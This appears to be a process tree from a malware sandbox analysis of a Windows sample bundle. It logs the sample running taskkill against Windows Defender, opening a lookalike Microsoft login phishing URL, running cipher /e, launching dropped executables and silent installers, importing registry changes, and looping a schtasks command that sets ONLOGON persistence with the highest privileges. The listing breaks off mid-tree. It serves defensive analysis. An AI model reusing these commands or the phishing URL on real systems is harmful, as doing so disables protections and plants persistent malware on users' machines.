C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵
- System Location Discovery: System Language Discovery
PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47184⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:24⤵PID:3520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:84⤵PID:3148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:14⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:14⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:14⤵PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:14⤵PID:5868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:14⤵PID:5288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:14⤵PID:4120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:14⤵PID:5280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:14⤵PID:2796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:14⤵PID:5836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:14⤵PID:3384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:14⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:14⤵PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:14⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:14⤵PID:3040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:14⤵PID:2424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 /prefetch:84⤵PID:2744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6520 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,9362081852114686798,7580626415369827631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:14⤵PID:6672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:1416 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:2092
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:6060
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:6008
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web.htm3⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a47184⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,1073972769638573412,11031580248756333554,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:24⤵PID:6088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,1073972769638573412,11031580248756333554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:2784
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1388
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6256
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6292
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6332
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:6356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6372 -
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6460
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 18125⤵
- Program crash
PID:7156
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
PID:6712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
PID:6864 -
C:\Users\Admin\AppData\Local\Temp\is-7GH9P.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7GH9P.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10392,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵PID:7024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:7064 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:6392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_3d0e9ebf-8e11-4a25-a11e-b3bae0267330\regmess.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:6512 -
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:6596
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:6684
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:6720
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵PID:6800
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
PID:7072
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵PID:7144
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:6332 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6356
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6508 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aEXFHh5zRoc3.bat" "5⤵PID:6696
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:4460
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3260
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6344 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:5936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wxe2a9FizKwp.bat" "7⤵PID:5324
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4216
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7056
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6632 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:6008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fa2i1oDen4Qg.bat" "9⤵PID:3116
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:3392
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5772
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4188 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PNJxRhA4xRtE.bat" "11⤵PID:400
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:7000
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6860
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4428 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D0dlcwOpfWJa.bat" "13⤵PID:5364
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:528
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5984
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3808 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:4004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FVmvLJr95Hd3.bat" "15⤵PID:1072
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:5840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5352
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4888 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:6764
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hd4cylztVXOK.bat" "17⤵PID:6612
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:4972
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3988
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6772 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:4972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RYUjuty5j44X.bat" "19⤵PID:4396
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:6700
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5244
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3528 -
